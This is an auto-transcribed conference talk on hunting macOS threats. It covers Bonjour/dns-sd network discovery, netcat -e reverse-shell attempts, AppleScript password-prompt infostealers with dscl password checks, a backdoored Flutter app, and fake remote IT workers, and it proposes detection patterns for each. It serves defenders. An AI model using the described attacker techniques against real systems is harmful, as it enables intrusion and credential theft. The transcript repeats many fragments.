#OBTS v8.0: "Gotta Catch 'em All" - Jaron Bradley

So that being said, let's move over to one of the more Mac heavy commands that

I've seen the Panda run in intrusions uh is the DNS- SD command. I talked a bit about this in my training as well. Um,

but this basically looks for Bonjour services on the network. Bonjour is uh like your your Mac has it installed by default. Most of your printers probably

default. Most of your printers probably have it installed by default. Bonjour is

a service that is basically broadcasting to the network. This is who I am. This

is what I do. Anybody need some help with anything? Uh, and that's how you

with anything? Uh, and that's how you can go to a friend's uh that's how you can go to a friend's house and use their printer without having done any prior setup. Right? it is quite useful. Um so

setup. Right? it is quite useful. Um so

in the case of uh in the case of Bonjour though in the way the attacker was using it uh essentially they were using it to ask the network if anybody else is

broadcasting the fact that they're using SSH. Um and any computer that uh any Mac

SSH. Um and any computer that uh any Mac that has SSH enabled will instantly respond and say yeah I'm open over here.

Right? It's a way to scan the network without actually scanning the network because every computer with SSH is saying already telling the network that it's broadcasting it. Um so seeing them

use that for lateral movement uh rather rather cool technique not seeing a lot of usage around this command in general.

Um so it makes it a really once again uh what we're aiming for in this talk kind of high fidelity low false positive sort of uh thing you can look for detect to detect big activity.

Now, the last thing I want to note also for the panda is attacker mistakes. I

that this this is kind of a a hunting theory that I came up with a long time ago and it works really well honestly and this this feeds into the whole touch-ring

on attacker mistakes. For example, uh if the attacker believes they're on a Linux system uh running netcat and has the e argument to run a shell over that network connection um that's not going

to work on Mac OS, right? But I've once saw this thread actor get on a system and try more than just this many attempts to use that e switch before realizing like oh the BSD netcat

listener does not have the dash e switch. So no legitimate software is

switch. So no legitimate software is going to be running this. You might be surprised how many developers in your environment are running netcat to do random automated tasks. Uh but uh even

your developers that have set up automation will not be doing it this way because there's no e switch. Therefore,

anytime dash e hits with netcat, you can assume something weird is going on.

Uh, so we can detect that. Once again,

going back to the exec command, a lot of what we're looking at here is just detections based on process name equals this weird arguments equals this, right?

Um, and that's uh that's that's honestly some of the detections we love the most, stuff that's really easy to write and comes back with a low false positive. So

uh look for DNS- SD, look for that bonjour, uh service being sort of scanned and then look for netcat whenever there's kind of the more

standard uh Linux uh arguments included with it. So dash e or-exec

with it. So dash e or-exec somebody trying to run a shell over netcat and that ultimately uh that's a number of different ways that you could catch this thread actor. Uh and many of them

are based on mistakes that that thread actor may have made.

Okay, so our next threat is that of info steelers, right? Can't really talk about

steelers, right? Can't really talk about the Mac OS threat landscape without talking about info steelers at the moment. So these are explosive over the

moment. So these are explosive over the last few years. Uh and there's reasons.

They have a wild success rate. Um and

attackers are are really good at this social engineering side, especially with some of the new stuff that AI has brought in. Um the idea is bad guys

brought in. Um the idea is bad guys essentially steal your keychain um whatever secrets they can and then they trade and they sell uh those passwords and secrets on the black market. They

share them with each other. They use

them um and they find you know they can say hey anyone got access to company XYZ and somebody can say yeah here I have I have I have this keychain I got this however long ago and yeah it's a huge

problem right now. This is a big problem in the Mac OS threat landscape. So uh

just a couple different really easy detections. Some of these maybe even

detections. Some of these maybe even being touched on in previous years at Objective by the Sea, but that dialogue uh almost every single info stealer starts with that Apple script dialogue.

Hey, I need your password. Please punch

it in. Easiest way to get the password on Mac OS is just by asking for it. Um

users will fall for this time after time. Developers, power users, doesn't

time. Developers, power users, doesn't matter who you are. We've all seen this and we've all said, "I ain't got time for that." And we've all typed in our

for that." And we've all typed in our password. Don't pretend you haven't. Um

password. Don't pretend you haven't. Um

but uh so looking for uh looking for OSUS script and then looking inside the uh the arguments for where you know we see the word password you see the word

credentials any any any uh um any field that an attacker might try to name something to get you to enter your password just look for that inside of OSAS script seen the admin scripts do

this as well not a big fan of that shouldn't really be using Apple script to prompt your users um but uh you know your environment hopefully better than anyone else. So you base the

anyone else. So you base the whitelisting off of uh off of your own scripts.

Another way to catch uh uh a lot of info steelers would be by using uh looking for Apple script running as well and looking for any time one of the um uh

one of the more anti-debugging checks runs. So looking for QMU, looking for

runs. So looking for QMU, looking for VMware. A lot of times uh again these uh

VMware. A lot of times uh again these uh these Apple scripts are just big shell outs with huge command lines. There's a

lot of different strings you can look for. Find the ones that are reused by

for. Find the ones that are reused by every single info stealer and base your detections on those. This is a low false positive easy win as well.

And then uh the third and final one I'll talk about is just uh DSCL uh using open directory using the command line to verify a password that the user entered

correctly. Uh this is done by attackers

correctly. Uh this is done by attackers um uh so that basically before they give up and stop asking for your password, they'll make sure what you typed in was correct. Right? So this is an easy win.

correct. Right? So this is an easy win.

Um don't see a lot of legitimate software like performing this check. Uh

see it from a lot of info steelers.

Watch for DSCL running under Apple script where the password is being verified. uh or even you might have good

verified. uh or even you might have good enough luck in your environment just looking for DSC uh DSCL running and the command line containing author.

So that is three different detections to identify a stealer essentially or many different steelers. Uh there are quite a

different steelers. Uh there are quite a few other processes you could pick up on when steelers run uh because again they all tend to rely pretty heavily on the command line. Um so it generates a lot

command line. Um so it generates a lot of opportunity for for looking at commands run and finding the similarities. Now the problem is these

similarities. Now the problem is these are so explosive that once we find an info stealer and once we sort of catch it there's a new one the next day that changes and and is obscured in a brand

new way. So these just keep multiplying.

new way. So these just keep multiplying.

Um so trying to find the detections across the different flavors is really important.

Okay, so let's turn our eyes back to no surprise the chalima uh because again uh most dangerous threat actor and most active threat actor I would say

targeting Mac OS. Um so uh one thing we'd like to know is very good at social engineering. Uh they're great at malware

engineering. Uh they're great at malware design and the theft of crypto. So, um,

before we get to the end, I just wanted to focus on, you know, much more a few more greater concerns that we've seen from this threat actor. And one of those

to us is undoubtedly uh, Flutter uh, and the attacker. We've seen um, sort of

the attacker. We've seen um, sort of messing and and testing with the Flutter framework. If you're not familiar with

framework. If you're not familiar with Flutter, it basically allows you to build applications uh, kind of uh, using the Dart language. Um, and then when you when you compile this app, you can

compile it for multiple platforms. You can compile it for Mac OS, it'll also work on iOS. It'll work on Android. It's

it's basically a way to build code and just kind of, you know, be thrilled with the fact that you don't got to build it five different ways with five different versions. It should just run. So what we

versions. It should just run. So what we have seen from this thread actor in testing is that uh they they've taken a open-source sort of mind sweeper uh

application um and then inside of that taken a common backd dooror that they frequently use and then added it um and then uh kind of compiled it and we found

it kind of sitting there on virus total.

Um, and uh, what's difficult about this, what's the most difficult about detecting this is the fact that the malicious code or any code that you're building gets loaded as a DIB. It

doesn't get loaded as the main executable. The main executable is just

executable. The main executable is just kind of uh, builds your Flutter app and then the DIB um, uh, called just app in this case is what gets loaded uh, and and holds all the malware and it's

highly obscured like just by nature.

It's not the actor actually doing that.

Um so uh this is this is a concern because this is very difficult to detect and um uh requires a bit more than just standard sort of ES events. It requires

some additional activity. So that's one thing we've been seeing the thread actor do. Um, but it also brings me to kind of

do. Um, but it also brings me to kind of the the, you know, final scenario or the last showdown that I wanted to discuss because, uh, it's an attack that's, uh,

been talked about heavily over the past few years. And yet, uh, um, it's another

few years. And yet, uh, um, it's another one that's very difficult to defend against. Um, and if you haven't uh if

against. Um, and if you haven't uh if you haven't heard of the shadow IT worker uh program sort of going on, essentially the Chelima is uh is

convinces you that you should hire them at your company, right? A lot of us have read about this. Uh hopefully most of us has heard about this, but the problem is you end up shipping a laptop to somebody

that is basically there to harm you. And

if you think about a work laptop and what access it has, uh you know that that wouldn't be too hard. So, the idea uh you hire someone in your company um who has a stolen identity. They're

pretending to be someone else. You ship

them a company laptop of some type. Now,

that laptop doesn't go directly to the person you hired. It actually ends up at a laptop farm. Um that laptop uh farm is probably uh someone's being paid to

operate uh that laptop farm. Uh they

might know they're doing something shady, but they might not ask too many questions. We've heard some different

questions. We've heard some different stories. Um meanwhile the threat actor

stories. Um meanwhile the threat actor can log into the various laptops and perform tasks kind of carefree since they're technically employed by the

company right so uh they do this with various remote technologies um so these are some different things if your company doesn't use these apps maybe do some searches to find out where these

apps are located in your in your fleet right so things like go to meetings log me in rust desk any desk any combination of these apps being installed as well.

It's not always just necessarily one app being installed. Sometimes there's many.

being installed. Sometimes there's many.

Um so essentially these are things if you know that your company is not like supporting and using. Yes, I know we all have you know there's commonly sales teams where they have one of each

installed that's fine but um maybe maybe verify what's going on if you see many different apps like this being installed on a system.

Uh and then finally, we also uh if if you've read like the Mandant report that kind of came out last year that provided a lot of different tippers on this type of activity, uh you may have also noticed something like AstralVPN.

Uh this is a common one used by uh by this attacker uh in this particular scenario. Um there are companies using

scenario. Um there are companies using this. It's not to say they're not, but

this. It's not to say they're not, but if your company is not paying for AstroVPN or using AstroVPN, pay extra close attention to any computer that has

this installed, maybe reach out. Make

sure that somebody has met the individual in person. That is one way to generally immediately find if this is of greater concern or not is that uh if there's no uh if there is if if this is

part of a scam, there will be no way to meet this person in person. they will be remote and that's the only way that we know of that this attack has been done is where the individual is never on site

that nobody at the company has met them.

Um on top of that you can look for maybe duplicate uh duplicate workers inside of your LinkedIn company profile could also be a good tip to sort of hunt uh some of

these uh some of these potential leads down.

Something else that we have seen, not just AstroVPN, uh we've seen uh attackers um in this scenario we believe also installing Snagit. Uh and really it

doesn't have to be Snag It, it can be anything that can take a screenshot and or video shot and kind of uh compress it in a good format to send off to wherever they're sending it off. So, um those are

two two tools to kind of look for. Um,

and if you're using MDM, like you don't even have to use security to kind of you don't even have to use telemetry or or you know, seam feeds to actually pull this off. If you're using like more of

this off. If you're using like more of an MDM um to manage your fleet, uh, you can easily most those MDMs will allow you to perform some type of search, right? And you can do that often with

right? And you can do that often with many different software in different combinations. So look for computers that

combinations. So look for computers that have both AstroVPN installed and Snag It, right? you can do these combinations

It, right? you can do these combinations uh and start these investigations even if you're not in a security role and you're more of an admin role like you still have the ability to sort of partake in that and find those

interesting finds.

So, uh again, check out the Mandian report from 2024. It's got the best leads on this. Um and I'd argue security experts and admins alike can partake in

this particular hunt. So, um and that's just by pulling on a few uh relatively easy scenarios.

So, uh, the last thing I kind of wanted to talk about, uh, Patrick sort of mentioned it for me. Thanks, Patrick.

But, uh, I've been working for some year and a half, uh, on a book called Threat Hunting Mac OS. And, uh, I finally have it with me. I announced it last year, uh, that I that it would be coming and,

uh, it's finally here. And it includes a lot uh, it includes a lot of stories like the ones that I've sort of shared here. I try to include those stories

here. I try to include those stories just in different things that I've seen in the threat hunting world um that I also just want to share uh with all of you. So, um I'll be out there at 1:00 uh

you. So, um I'll be out there at 1:00 uh for the book signing. I have the number of books I was able to fly over with. Uh

I apologize for that, but uh uh I'll find a way to eventually ship it here uh to Europe at some point and more than that. Um right now I'm only shipping to

that. Um right now I'm only shipping to the US. If anybody would like to um buy

the US. If anybody would like to um buy the book here at the OBTS price, I'm hap and lives in the US, I'm happy to ship it to you there so that we save a few extra books for uh those purchasing here

in Europe. So um but uh that is all I

in Europe. So um but uh that is all I have. Thank you very much. And uh I've

have. Thank you very much. And uh I've gone over time, so I'm going to hop right off the stage here.